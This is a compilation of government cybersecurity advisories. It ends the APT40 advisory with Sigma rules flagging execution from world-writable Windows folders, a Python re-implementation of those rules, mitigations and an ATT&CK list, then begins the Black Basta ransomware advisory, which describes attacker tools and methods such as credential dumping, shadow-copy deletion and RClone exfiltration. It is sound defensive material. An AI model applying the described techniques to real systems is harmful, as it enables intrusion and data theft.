          - ':\\Windows\\PolicyDefinitions\\'
          - ':\\Windows\\Prefetch\\'
          - ':\\Windows\\PrintDialog\\'
          - ':\\Windows\\Provisioning\\'
          - ':\\Windows\\Registration\\CRMLog\\'
          - ':\\Windows\\RemotePackages\\'
          - ':\\Windows\\rescache\\'
          - ':\\Windows\\Resources\\'
          - ':\\Windows\\SchCache\\'
          - ':\\Windows\\schemas\\'
          - ':\\Windows\\security\\'
          - ':\\Windows\\ServiceState\\'
          - ':\\Windows\\servicing\\'
          - ':\\Windows\\Setup\\'
          - ':\\Windows\\ShellComponents\\'
          - ':\\Windows\\ShellExperiences\\'
          - ':\\Windows\\SKB\\'
          - ':\\Windows\\TAPI\\'
          - ':\\Windows\\Tasks\\'
          - ':\\Windows\\TextInput\\'
          - ':\\Windows\\tracing\\'
          - ':\\Windows\\Vss\\'
          - ':\\Windows\\WaaS\\'
          - ':\\Windows\\Web\\'
          - ':\\Windows\\wlansvc\\'
          - ':\\Windows\\System32\\Com\\dmp\\'
          - ':\\Windows\\System32\\FxsTmp\\'
          - ':\\Windows\\System32\\Microsoft\\Crypto\\RSA\\MachineKeys\\'
          - ':\\Windows\\System32\\Speech\\'
          - ':\\Windows\\System32\\spool\\drivers\\color\\'
          - ':\\Windows\\System32\\spool\\PRINTERS\\'
          - ':\\Windows\\System32\\spool\\SERVERS\\'
          - ':\\Windows\\System32\\Tasks_Migrated\\Microsoft\\Windows\\PLA\\System\\'
          - ':\\Windows\\System32\\Tasks\\'
          - ':\\Windows\\SysWOW64\\Com\\dmp\\'
          - ':\\Windows\\SysWOW64\\FxsTmp\\'
          - ':\\Windows\\SysWOW64\\Tasks\\'
      appdata:
        Image|contains: '\\AppData\\'
        User: 'SYSTEM'
      condition: writable_path and not appdata
    False positives: Allowlist auditing applications have been observed running executables from these directories. It is plausible that scripts and administrative tools used in the monitored environment(s) may be located in one of these directories and should be addressed on a case-by-case basis.
    Level: high

    Title: World Writable Execution – Users
    ID: 6dda3843-182a-4214-9263-925a80b4c634
    Description: Detect process execution from C:\Users\Public\* and other world writable folders within Users.
    Background: AppData folders are excluded if a file is run as SYSTEM; this is a benign way in which many temporary application files are executed.
    Investigation: Examine information directly associated with this file execution, such as the user context, execution integrity level, immediate follow-on activity and images loaded by the file. Investigate contextual process, network, file and other supporting data on the host to help make an assessment as to whether the activity is malicious. If necessary, attempt to collect a copy of the file for reverse engineering to determine whether it is legitimate.
    References: Process Execution from an Unusual Directory
    Author: ASD’s ACSC
    Date: 2024/06/19
    Status: experimental
    Tags: tlp.green, classification.au.official, attack.execution
    Log Source:
      category: process_creation
      product: windows
    Detection:
      users:
        Image|contains:
          - ':\\Users\\All Users\\'
          - ':\\Users\\Contacts\\'
          - ':\\Users\\Default\\'
          - ':\\Users\\Public\\'
          - ':\\Users\\Searches\\'
      appdata:
        Image|contains: '\\AppData\\'
        User: 'SYSTEM'
      condition: users and not appdata
    False positives: It is plausible that scripts and administrative tools used in the monitored environment(s) may be located in Public or a subdirectory and should be addressed on a case-by-case basis.
    Level: medium

    Mitigations

    Logging

    During ASD’s ACSC investigations, a common issue that reduces the effectiveness and speed of investigative efforts is a lack of comprehensive and historical logging information across a number of areas including web server request logs, Windows event logs and internet proxy logs. ASD’s ACSC recommends reviewing and implementing their guidance on Windows Event Logging and Forwarding, including the configuration files and scripts in the Windows Event Logging Repository and the Information Security Manual’s Guidelines for System Monitoring, to include centralizing logs and retaining logs for a suitable period.

    Patch Management

    Promptly patch all internet exposed devices and services, including web servers, web applications, and remote access gateways. Consider implementing a centralized patch management system to automate and expedite the process. ASD’s ACSC recommends implementation of the ISM’s Guidelines for System Management, specifically the System Patching controls where applicable. Most exploits utilized by the actor were publicly known and had patches or mitigations available. Organizations should ensure that security patches or mitigations are applied to internet facing infrastructure within 48 hours, and where possible, use the latest versions of software and operating systems.
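    The three "World Writable Execution" Sigma rules in the Detection section above can be exercised offline before they are deployed to a SIEM. The following is an added example, not code from ASD's ACSC or from the advisory: it re-implements the rules' inclusion and exclusion logic as plain Python over process_creation events, keeping the Sigma field names (Image, ParentImage, User) and the rules' GUID regex, and uses a representative subset of the second rule's path list rather than the full list. The sample events are constructed for the example. Sigma string modifiers are case-insensitive, so comparisons are done on lower-cased values.

```python
import re

# Added example, not code from the advisory: the three "World Writable Execution"
# Sigma rules above, re-implemented as plain Python over process_creation events
# so the inclusion/exclusion logic can be run offline. Field names (Image,
# ParentImage, User) follow the Sigma rules; Sigma string modifiers are
# case-insensitive, so comparisons are done on lower-cased values.

TEMP_PREFIX = "c:\\windows\\temp\\"
# Sigma 're' modifier: unanchored regex search over Image (GUID-named Temp subfolders).
GUID_TEMP_RE = re.compile(
    r"C:\\Windows\\Temp\\\{[a-fA-F0-9]{8}-([a-fA-F0-9]{4}-){3}[a-fA-F0-9]{12}\}\\",
    re.IGNORECASE,
)
SYSTEM_USERS = {"SYSTEM", "NETWORK SERVICE"}
KNOWN_PARENTS = ("\\esif_uf.exe", "\\vmtoolsd.exe", "\\cwainstaller.exe", "\\trolleyexpress.exe")

# Representative subset of the second rule's writable_path list (the full list is in the rule above).
WRITABLE_SYSTEM_PATHS = (
    ":\\$recycle.bin\\", ":\\perflogs\\", ":\\windows\\tasks\\", ":\\windows\\tracing\\",
    ":\\windows\\debug\\", ":\\windows\\system32\\spool\\drivers\\color\\",
    ":\\windows\\system32\\tasks\\", ":\\windows\\syswow64\\tasks\\",
)
USERS_PATHS = (
    ":\\users\\all users\\", ":\\users\\contacts\\", ":\\users\\default\\",
    ":\\users\\public\\", ":\\users\\searches\\",
)


def _appdata_as_system(event):
    """Shared exclusion: AppData binaries run as SYSTEM are treated as benign by the rules."""
    return "\\appdata\\" in event.get("Image", "").lower() and event.get("User", "").upper() == "SYSTEM"


def rule_temp(event):
    """World Writable Execution - Temp (level: low)."""
    image = event.get("Image", "")
    if not image.lower().startswith(TEMP_PREFIX):
        return False
    if GUID_TEMP_RE.search(image):          # common_temp_path exclusion
        return False
    if event.get("User", "").upper() in SYSTEM_USERS:  # system_user exclusion
        return False
    if image.lower().endswith("dismhost.exe"):          # dismhost exclusion
        return False
    parent = event.get("ParentImage", "").lower()
    return not any(parent.endswith(p) for p in KNOWN_PARENTS)  # known_parent exclusion


def rule_system_subdir(event):
    """World Writable Execution - Non-Temp System Subdirectory (level: high)."""
    image = event.get("Image", "").lower()
    return any(p in image for p in WRITABLE_SYSTEM_PATHS) and not _appdata_as_system(event)


def rule_users(event):
    """World Writable Execution - Users (level: medium)."""
    image = event.get("Image", "").lower()
    return any(p in image for p in USERS_PATHS) and not _appdata_as_system(event)


RULES = (
    ("World Writable Execution - Temp", "low", rule_temp),
    ("World Writable Execution - Non-Temp System Subdirectory", "high", rule_system_subdir),
    ("World Writable Execution - Users", "medium", rule_users),
)


def evaluate(event):
    """Return the titles of the rules that fire for one process_creation event."""
    return [title for title, _level, fn in RULES if fn(event)]


# Constructed sample events (not from the investigation described above).
SAMPLE_EVENTS = [
    {"Image": "C:\\Windows\\Temp\\updater.exe", "User": "alice",
     "ParentImage": "C:\\Windows\\explorer.exe"},                          # fires Temp
    {"Image": "C:\\Windows\\Temp\\{12345678-abcd-ef01-2345-6789abcdef01}\\setup.exe",
     "User": "alice", "ParentImage": "C:\\Windows\\explorer.exe"},         # GUID folder: excluded
    {"Image": "C:\\Windows\\Temp\\svc.exe", "User": "SYSTEM",
     "ParentImage": "C:\\Windows\\System32\\services.exe"},                # SYSTEM: excluded
    {"Image": "C:\\Windows\\Temp\\vmt\\helper.exe", "User": "bob",
     "ParentImage": "C:\\Program Files\\VMware\\vmtoolsd.exe"},            # known parent: excluded
    {"Image": "C:\\Windows\\Tasks\\run.exe", "User": "bob",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe"},                     # fires Non-Temp System Subdirectory
    {"Image": "C:\\Users\\Public\\tool.exe", "User": "bob",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe"},                     # fires Users
    {"Image": "C:\\Program Files\\Vendor\\app.exe", "User": "bob",
     "ParentImage": "C:\\Windows\\explorer.exe"},                          # no rule fires
]

if __name__ == "__main__":
    for e in SAMPLE_EVENTS:
        print(f"{e['Image']} ({e['User']}): {evaluate(e) or 'no rule fired'}")
```

    Running the sample events shows which exclusions suppress an alert (a GUID-named Temp folder, a SYSTEM context, a known installer parent) and which paths fire, which is the same baselining exercise the rules' Background and False positives fields recommend before deployment.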
    Network Segmentation

    Network segmentation can make it significantly more difficult for adversaries to locate and gain access to an organization’s sensitive data. Segment networks to limit or block lateral movement by denying traffic between computers unless required. Important servers such as Active Directory and other authentication servers should only be able to be administered from a limited number of intermediary servers or “jump servers.” These servers should be closely monitored, be well secured and limit which users and devices are able to connect to them. Regardless of instances identified where lateral movement is prevented, additional network segmentation could have further limited the amount of data the actors were able to access and extract.

    Additional Mitigations

    The authoring agencies also recommend the following mitigations to combat APT40 and others’ use of the TTPs below.
    - Disable unused or unnecessary network services, ports and protocols.
    - Use well-tuned Web application firewalls (WAFs) to protect webservers and applications.
    - Enforce least privilege to limit access to servers, file shares, and other resources.
    - Use multi-factor authentication (MFA) and managed service accounts to make credentials harder to crack and reuse. MFA should be applied to all internet accessible remote access services, including: web and cloud-based email; collaboration platforms; virtual private network connections; and remote desktop services.
    - Replace end-of-life equipment.

    Table 1: Mitigation Strategies/Techniques

    TTP: Initial Access, T1190 Exploitation of Public-Facing Application
    Essential Eight Mitigation Strategies: Patch applications; Patch operating systems; Multi-factor authentication; Application control
    ISM Controls: ISM-0140, ISM-1698, ISM-1701, ISM-1921, ISM-1876, ISM-1877, ISM-1905

    TTP: Execution, T1059 Command and Scripting Interpreter
    Essential Eight Mitigation Strategies: Application control; Restrict Microsoft Office macros; Restrict administrative privileges
    ISM Controls: ISM-0140, ISM-1490, ISM-1622, ISM-1623, ISM-1657, ISM-1890

    TTP: Persistence, T1505.003 Server Software Component: Web Shell
    Essential Eight Mitigation Strategies: Application control; Restrict administrative privileges
    ISM Controls: ISM-0140, ISM-1246, ISM-1746, ISM-1249, ISM-1250, ISM-1490, ISM-1657, ISM-1871

    TTP: Initial Access / Privilege Escalation / Persistence, T1078 Valid Accounts
    Essential Eight Mitigation Strategies: Patch operating systems; Multi-factor authentication; Restrict administrative privileges; Application control; User application hardening
    ISM Controls: ISM-0140, ISM-0859, ISM-1546, ISM-1504, ISM-1679

    For additional general detection and mitigation advice, please consult the Mitigations and Detection sections on the MITRE ATT&CK technique web page for each of the techniques identified in the MITRE ATT&CK summary at the end of this advisory.

    Reporting

    - Australian organizations: visit cyber.gov.au or call 1300 292 371 (1300 CYBER 1) to report cybersecurity incidents and to access alerts and advisories.
    - Canadian organizations: report incidents by emailing CCCS at contact@cyber.gc.ca.
    - New Zealand organizations: report cyber security incidents to incidents@ncsc.govt.nz or call 04 498 7654.
    - United Kingdom organizations: report a significant cyber security incident at National Cyber Security Centre (monitored 24 hours) or, for urgent assistance, call 03000 200 973.
    - U.S. organizations: report incidents and anomalous activity to CISA 24/7 Operations Center at report@cisa.gov or (888) 282-0870 and/or to the FBI via your local FBI field office, the FBI’s 24/7 CyWatch at (855) 292-3937, or CyWatch@fbi.gov.
    When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact.

    Disclaimer

    The information in this report is being provided “as is” for informational purposes only. The authoring agencies do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the authoring agencies.

    MITRE ATT&CK – Historical APT40 Tradecraft of Interest

    Reconnaissance (TA0043)
    - Search Victim-Owned Websites [T1594]
    - Gather Victim Identity Information: Credentials [T1589.001]
    - Active Scanning: Vulnerability Scanning [T1595.002]
    - Gather Victim Host Information [T1592]
    - Search Open Websites/Domains: Search Engines [T1593.002]
    - Gather Victim Network Information: Domain Properties [T1590.001]
    - Gather Victim Identity Information: Email Addresses [T1589.002]

    Resource Development (TA0042)
    - Acquire Infrastructure: Domains [T1583.001]
    - Acquire Infrastructure [T1583]
    - Acquire Infrastructure: DNS Server [T1583.002]
    - Compromise Accounts [T1586]
    - Develop Capabilities: Code Signing Certificates [T1587.002]
    - Compromise Infrastructure [T1584]
    - Develop Capabilities: Digital Certificates [T1587.003]
    - Develop Capabilities: Malware [T1587.001]
    - Obtain Capabilities: Code Signing Certificates [T1588.003]
    - Establish Accounts: Cloud Accounts [T1585.003]
    - Compromise Infrastructure: Network Devices [T1584.008]
    - Obtain Capabilities: Digital Certificates [T1588.004]

    Initial Access (TA0001)
    - Valid Accounts [T1078]
    - Phishing [T1566]
    - Valid Accounts: Default Accounts [T1078.001]
    - Phishing: Spearphishing Attachment [T1566.001]
    - Valid Accounts: Domain Accounts [T1078.002]
    - Phishing: Spearphishing Link [T1566.002]
    - External Remote Services [T1133]
    - Exploit Public-Facing Application [T1190]
    - Drive-by Compromise [T1189]

    Execution (TA0002)
    - Windows Management Instrumentation [T1047]
    - Command and Scripting Interpreter: Python [T1059.006]
    - Scheduled Task/Job: At [T1053.002]
    - Command and Scripting Interpreter: JavaScript [T1059.007]
    - Scheduled Task/Job: Scheduled Task [T1053.005]
    - Native API [T1106]
    - Command and Scripting Interpreter [T1059]
    - Inter-Process Communication [T1559]
    - Command and Scripting Interpreter: Windows Command Shell [T1059.003]
    - System Services: Service Execution [T1569.002]
    - Command and Scripting Interpreter: PowerShell [T1059.001]
    - Exploitation for Client Execution [T1203]
    - Command and Scripting Interpreter: Visual Basic [T1059.005]
    - User Execution: Malicious File [T1204.002]
    - Command and Scripting Interpreter: Unix Shell [T1059.004]
    - Command and Scripting Interpreter: AppleScript [T1059.002]
    - Scheduled Task/Job: Cron [T1053.003]
    - Software Deployment Tools [T1072]

    Persistence (TA0003)
    - Valid Accounts [T1078]
    - Server Software Component: Web Shell [T1505.003]
    - Office Application Startup: Office Template Macros [T1137.001]
    - Create or Modify System Process: Windows Service [T1543.003]
    - Scheduled Task/Job: At [T1053.002]
    - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder [T1547.001]
    - Scheduled Task/Job: Scheduled Task [T1053.005]
    - Boot or Logon Autostart Execution: Shortcut Modification [T1547.009]
    - External Remote Services [T1133]
    - Hijack Execution Flow: DLL Search Order Hijacking [T1574.001]
    - Scheduled Task/Job: Cron [T1053.003]
    - Hijack Execution Flow: DLL Side-Loading [T1574.002]
    - Account Manipulation [T1098]
    - Valid Accounts: Cloud Accounts [T1078.004]
    - Valid Accounts: Domain Accounts [T1078.002]

    Privilege Escalation (TA0004)
    - Scheduled Task/Job: At [T1053.002]
    - Create or Modify System Process: Windows Service [T1543.003]
    - Scheduled Task/Job: Scheduled Task [T1053.005]
    - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder [T1547.001]
    - Process Injection: Thread Execution Hijacking [T1055.003]
    - Boot or Logon Autostart Execution: Shortcut Modification [T1547.009]
    - Process Injection: Process Hollowing [T1055.012]
    - Hijack Execution Flow: DLL Search Order Hijacking [T1574.001]
    - Valid Accounts: Domain Accounts [T1078.002]
    - Exploitation for Privilege Escalation [T1068]
    - Access Token Manipulation: Token Impersonation/Theft [T1134.001]
    - Event Triggered Execution: Unix Shell Configuration Modification [T1546.004]
    - Process Injection: Dynamic-link Library Injection [T1055.001]
    - Valid Accounts: Local Accounts [T1078.003]

    Defense Evasion (TA0005)
    - Rootkit [T1014]
    - Indirect Command Execution [T1202]
    - Obfuscated Files or Information [T1027]
    - System Binary Proxy Execution: Mshta [T1218.005]
    - Obfuscated Files or Information: Software Packing [T1027.002]
    - System Binary Proxy Execution: Regsvr32 [T1218.010]
    - Obfuscated Files or Information: Steganography [T1027.003]
    - Subvert Trust Controls: Code Signing [T1553.002]
    - Obfuscated Files or Information: Compile After Delivery [T1027.004]
    - File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification [T1222.002]
    - Masquerading: Match Legitimate Name or Location [T1036.005]
    - Virtualization/Sandbox Evasion: System Checks [T1497.001]
    - Process Injection: Thread Execution Hijacking [T1055.003]
    - Masquerading [T1036]
    - Reflective Code Loading [T1620]
    - Impair Defenses: Disable or Modify System Firewall [T1562.004]
    - Process Injection: Process Hollowing [T1055.012]
    - Hide Artifacts: Hidden Files and Directories [T1564.001]
    - Indicator Removal: File Deletion [T1070.004]
    - Hide Artifacts: Hidden Window [T1564.003]
    - Indicator Removal: Timestomp [T1070.006]
    - Hijack Execution Flow: DLL Search Order Hijacking [T1574.001]
    - Indicator Removal: Clear Windows Event Logs [T1070.001]
    - Hijack Execution Flow: DLL Side-Loading [T1574.002]
    - Modify Registry [T1112]
    - Web Service [T1102]
    - Deobfuscate/Decode Files or Information [T1140]
    - Masquerading: Masquerade Task or Service [T1036.004]
    - Impair Defenses [T1562]

    Credential Access (TA0006)
    - OS Credential Dumping: LSASS Memory [T1003.001]
    - Unsecured Credentials: Credentials in Files [T1552.001]
    - OS Credential Dumping: NTDS [T1003.003]
    - Brute Force: Password Guessing [T1110.001]
    - Network Sniffing [T1040]
    - Forced Authentication [T1187]
    - Credentials from Password Stores: Keychain [T1555.001]
    - Steal or Forge Kerberos Tickets: Kerberoasting [T1558.003]
    - Input Capture: Keylogging [T1056.001]
    - Multi-Factor Authentication Interception [T1111]
    - Steal Web Session Cookie [T1539]
    - Steal Application Access Token [T1528]
    - Exploitation for Credential Access [T1212]
    - Brute Force: Password Cracking [T1110.002]
    - Input Capture: Web Portal Capture [T1056.003]
    - OS Credential Dumping: DCSync [T1003.006]
    - Credentials from Password Stores [T1555]
    - Credentials from Password Stores: Credentials from Web Browsers [T1555.003]

    Discovery (TA0007)
    - System Service Discovery [T1007]
    - System Information Discovery [T1082]
    - Application Window Discovery [T1010]
    - Account Discovery: Local Account [T1087.001]
    - Query Registry [T1012]
    - File and Directory Discovery [T1083]
    - System Time Discovery [T1124]
    - Network Service Discovery [T1046]
    - System Owner/User Discovery [T1033]
    - Remote System Discovery [T1018]
    - Domain Trust Discovery [T1482]
    - Account Discovery: Email Account [T1087.003]
    - Account Discovery: Domain Account [T1087.002]
    - System Network Connections Discovery [T1049]
    - Virtualization/Sandbox Evasion: System Checks [T1497.001]
    - Process Discovery [T1057]
    - Software Discovery [T1518]
    - Permission Groups Discovery: Domain Groups [T1069.002]
    - Network Share Discovery [T1135]
    - System Network Configuration Discovery: Internet Connection Discovery [T1016.001]

    Lateral Movement (TA0008)
    - Remote Services: Remote Desktop Protocol [T1021.001]
    - Remote Services [T1021]
    - Remote Services: SMB/Windows Admin Shares [T1021.002]
    - Use Alternate Authentication Material: Pass the Ticket [T1550.003]
    - Remote Services: Windows Remote Management [T1021.006]
    - Lateral Tool Transfer [T1570]

    Collection (TA0009)
    - Data from Local System [T1005]
    - Archive Collected Data: Archive via Library [T1560.002]
    - Data from Network Shared Drive [T1039]
    - Email Collection: Remote Email Collection [T1114.002]
    - Input Capture: Keylogging [T1056.001]
    - Clipboard Data [T1115]
    - Automated Collection [T1119]
    - Data from Information Repositories [T1213]
    - Input Capture: Web Portal Capture [T1056.003]
    - Data Staged: Remote Data Staging [T1074.002]
    - Data Staged: Local Data Staging [T1074.001]
    - Archive Collected Data [T1560]
    - Email Collection [T1114]

    Exfiltration (TA0010)
    - Exfiltration Over C2 Channel [T1041]
    - Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [T1048.002]
    - Exfiltration Over Alternative Protocol [T1048]
    - Exfiltration Over Web Service: Exfiltration to Cloud Storage [T1567.002]

    Command and Control (TA0011)
    - Data Obfuscation: Protocol Impersonation [T1001.003]
    - Web Service: Dead Drop Resolver [T1102.001]
    - Commonly Used Port [T1043]
    - Web Service: One-Way Communication [T1102.003]
    - Application Layer Protocol: Web Protocols [T1071.001]
    - Ingress Tool Transfer [T1105]
    - Application Layer Protocol: File Transfer Protocols [T1071.002]
    - Proxy: Internal Proxy [T1090.001]
    - Proxy: External Proxy [T1090.002]
    - Non-Standard Port [T1571]
    - Proxy: Multi-hop Proxy [T1090.003]
    - Protocol Tunneling [T1572]
    - Web Service: Bidirectional Communication [T1102.002]
    - Encrypted Channel [T1573]
    - Encrypted Channel: Asymmetric Cryptography [T1573.002]
    - Proxy [T1090]

    Impact (TA0040)
    - Service Stop [T1489]
    - Disk Wipe [T1561]
    - System Shutdown/Reboot [T1529]
    - Resource Hijacking [T1496]
    Notes

    [1] U.S. Department of Justice. 2021. Four Chinese Nationals Working with the Ministry of State Security Charged with Global Computer Intrusion Campaign Targeting Intellectual Property and Confidential Business Information, Including Infectious Disease Research.
    [2] In this context, an endpoint is a function of the web application.
    [3] Service accounts are not tied to individual users, but rather to services. In a Microsoft corporate domain, there are various kinds of accounts.
    [4] Mounting shares is the process of making files on a file system structure accessible to a user or user group.

  • #StopRansomware: Black Basta
    by CISA (CISA Cybersecurity Advisories) on 10 Maggio 2024 at 1:02 pm

    SUMMARY

    Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.

    The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), Department of Health and Human Services (HHS), and Multi-State Information Sharing and Analysis Center (MS-ISAC) (hereafter referred to as the authoring organizations) are releasing this joint CSA to provide information on Black Basta, a ransomware variant whose actors have encrypted and stolen data from at least 12 out of 16 critical infrastructure sectors, including the Healthcare and Public Health (HPH) Sector. This joint CSA provides TTPs and IOCs obtained from FBI investigations and third-party reporting.

    Black Basta is considered a ransomware-as-a-service (RaaS) variant and was first identified in April 2022. Black Basta affiliates have impacted a wide range of businesses and critical infrastructure in North America, Europe, and Australia. As of May 2024, Black Basta affiliates have impacted over 500 organizations globally. Black Basta affiliates use common initial access techniques—such as phishing and exploiting known vulnerabilities—and then employ a double-extortion model, both encrypting systems and exfiltrating data. Ransom notes do not generally include an initial ransom demand or payment instructions. Instead, the notes provide victims with a unique code and instruct them to contact the ransomware group via a .onion URL (reachable through the Tor browser). Typically, the ransom notes give victims between 10 and 12 days to pay the ransom before the ransomware group publishes their data on the Black Basta Tor site, Basta News.

    Healthcare organizations are attractive targets for cybercrime actors due to their size, technological dependence, access to personal health information, and unique impacts from patient care disruptions.

    The authoring organizations urge HPH Sector and all critical infrastructure organizations to apply the recommendations in the Mitigations section of this CSA to reduce the likelihood of compromise from Black Basta and other ransomware attacks. Victims of ransomware should report the incident to their local FBI field office or CISA (see the Reporting section for contact information).

    Download the PDF version of this report:
    - AA24-131A #StopRansomware: Black Basta (PDF, 613.62 KB)
    - AA24-131A #StopRansomware: Black Basta (Spanish) (PDF, 621.68 KB)

    For a downloadable copy of IOCs, see:
    - AA24-131A STIX XML (XML, 237.45 KB)
    - AA24-131A STIX JSON (JSON, 180.78 KB)

    TECHNICAL DETAILS

    Note: This advisory uses the MITRE ATT&CK for Enterprise framework, version 15. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK® tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.

    Initial Access

    Black Basta affiliates primarily use spearphishing [T1566] to obtain initial access. According to cybersecurity researchers, affiliates have also used Qakbot during initial access.[1] Starting in February 2024, Black Basta affiliates began exploiting ConnectWise vulnerability CVE-2024-1709 [CWE-288] [T1190]. In some instances, affiliates have been observed abusing valid credentials [T1078].
    Discovery and Execution

    Black Basta affiliates use tools such as SoftPerfect network scanner (netscan.exe) to conduct network scanning. Cybersecurity researchers have observed affiliates conducting reconnaissance using utilities with innocuous file names such as Intel or Dell, left in the root drive C:\ [T1036].[1]

    Lateral Movement

    Black Basta affiliates use tools such as BITSAdmin and PsExec, along with Remote Desktop Protocol (RDP), for lateral movement. Some affiliates also use tools like Splashtop, Screen Connect, and Cobalt Strike beacons to assist with remote access and lateral movement.

    Privilege Escalation and Lateral Movement

    Black Basta affiliates use credential scraping tools like Mimikatz for privilege escalation. According to cybersecurity researchers, Black Basta affiliates have also exploited ZeroLogon (CVE-2020-1472 [CWE-330]), NoPac (CVE-2021-42278 [CWE-20] and CVE-2021-42287 [CWE-269]), and PrintNightmare (CVE-2021-34527 [CWE-269]) vulnerabilities for local and Windows Active Domain privilege escalation [T1068].[1],[2]

    Exfiltration and Encryption

    Black Basta affiliates use RClone to facilitate data exfiltration prior to encryption. Prior to exfiltration, cybersecurity researchers have observed Black Basta affiliates using PowerShell [T1059.001] to disable antivirus products, and in some instances, deploying a tool called Backstab, designed to disable endpoint detection and response (EDR) tooling [T1562.001].[3] Once antivirus programs are terminated, a ChaCha20 algorithm with an RSA-4096 public key fully encrypts files [T1486]. A .basta or otherwise random file extension is added to file names and a ransom note titled readme.txt is left on the compromised system.[4] To further inhibit system recovery, affiliates use the vssadmin.exe program to delete volume shadow copies [T1490].[5]

    Leveraged Tools

    See Table 1 for publicly available tools and applications used by Black Basta affiliates.
This includes legitimate tools repurposed for their operations.

Disclaimer: Use of these tools and applications should not be attributed as malicious without analytical evidence to support threat actor use and/or control.

Table 1: Tools Used by Black Basta Affiliates

Tool Name | Description
BITSAdmin | A command-line utility that manages downloads/uploads between a client and server by using the Background Intelligent Transfer Service (BITS) to perform asynchronous file transfers.
Cobalt Strike | A penetration testing tool used by security professionals to test the security of networks and systems. Black Basta affiliates have used it to assist with lateral movement and file execution.
Mimikatz | A tool that allows users to view and save authentication credentials such as Kerberos tickets. Black Basta affiliates have used it to aid in privilege escalation.
PSExec | A tool designed to run programs and execute commands on remote systems.
PowerShell | A cross-platform task automation solution made up of a command-line shell, a scripting language, and a configuration management framework, which runs on Windows, Linux, and macOS.
RClone | A command line program used to sync files with cloud storage services such as Mega.
SoftPerfect | A network scanner (netscan.exe) used to ping computers, scan ports, discover shared folders, and retrieve information about network devices via Windows Management Instrumentation (WMI), Simple Network Management Protocol (SNMP), HTTP, Secure Shell (SSH) and PowerShell. It also scans for remote services, registry, files, and performance counters.
ScreenConnect | Remote support, access, and meeting software that allows users to control devices remotely over the internet.
Splashtop | Remote desktop software that allows remote access to devices for support, access, and collaboration.
WinSCP | Windows Secure Copy is a free and open source SSH File Transfer Protocol, File Transfer Protocol, WebDAV, Amazon S3, and secure copy protocol client.
Black Basta affiliates have used it to transfer data from a compromised network to actor-controlled accounts.

MITRE ATT&CK TACTICS AND TECHNIQUES

See Tables 2–6 for all referenced threat actor tactics and techniques in this advisory.

Table 2: Black Basta ATT&CK Techniques for Initial Access

Technique Title | ID | Use
Phishing | T1566 | Black Basta affiliates have used spearphishing emails to obtain initial access.
Exploit Public-Facing Application | T1190 | Black Basta affiliates have exploited ConnectWise vulnerability CVE-2024-1709 to obtain initial access.

Table 3: Black Basta ATT&CK Techniques for Privilege Escalation

Technique Title | ID | Use
Exploitation for Privilege Escalation | T1068 | Black Basta affiliates have used credential scraping tools like Mimikatz, and the Zerologon, NoPac and PrintNightmare vulnerabilities, for privilege escalation.

Table 4: Black Basta ATT&CK Techniques for Defense Evasion

Technique Title | ID | Use
Masquerading | T1036 | Black Basta affiliates have conducted reconnaissance using utilities with innocuous file names, such as Intel or Dell, to evade detection.
Impair Defenses: Disable or Modify Tools | T1562.001 | Black Basta affiliates have deployed a tool called Backstab to disable endpoint detection and response (EDR) tooling. Black Basta affiliates have used PowerShell to disable antivirus products.

Table 5: Black Basta ATT&CK Techniques for Execution

Technique Title | ID | Use
Command and Scripting Interpreter: PowerShell | T1059.001 | Black Basta affiliates have used PowerShell to disable antivirus products.

Table 6: Black Basta ATT&CK Techniques for Impact

Technique Title | ID | Use
Inhibit System Recovery | T1490 | Black Basta affiliates have used the vssadmin.exe program to delete shadow copies.
Data Encrypted for Impact | T1486 | Black Basta affiliates have used a public key to fully encrypt files.

INDICATORS OF COMPROMISE

See Table 7 for IOCs obtained from FBI investigations.
Table 7: Malicious Files Associated with Black Basta Ransomware

Hash | Description
0112e3b20872760dda5f658f6b546c85f126e803e27f0577b294f335ffa5a298 | rclone.exe
d3683beca3a40574e5fd68d30451137e4a8bbaca8c428ebb781d565d6a70385e | Winscp.exe
88c8b472108e0d79d16a1634499c1b45048a10a38ee799054414613cc9dccccc | DLL
58ddbea084ce18cfb3439219ebcf2fc5c1605d2f6271610b1c7af77b8d0484bd | DLL
39939eacfbc20a2607064994497e3e886c90cd97b25926478434f46c95bd8ead | DLL
5b2178c7a0fd69ab00cef041f446e04098bbb397946eda3f6755f9d94d53c221 | DLL
51eb749d6cbd08baf9d43c2f83abd9d4d86eb5206f62ba43b768251a98ce9d3e | DLL
d15bfbc181aac8ce9faa05c2063ef4695c09b718596f43edc81ca02ef03110d1 | DLL
5942143614d8ed34567ea472c2b819777edd25c00b3e1b13b1ae98d7f9e28d43 | DLL
05ebae760340fe44362ab7c8f70b2d89d6c9ba9b9ee8a9f747b2f19d326c3431 | DLL
a7b36482ba5bca7a143a795074c432ed627d6afa5bc64de97fa660faa852f1a6 | DLL
86a4dd6be867846b251460d2a0874e6413589878d27f2c4482b54cec134cc737 | DLL
07117c02a09410f47a326b52c7f17407e63ba5e6ff97277446efc75b862d2799 | DLL
96339a7e87ffce6ced247feb9b4cb7c05b83ca315976a9522155bad726b8e5be | ELF
1c1b2d7f790750d60a14bd661dae5c5565f00c6ca7d03d062adcecda807e1779 | ELF
360c9c8f0a62010d455f35588ef27817ad35c715a5f291e43449ce6cb1986b98 | ELF
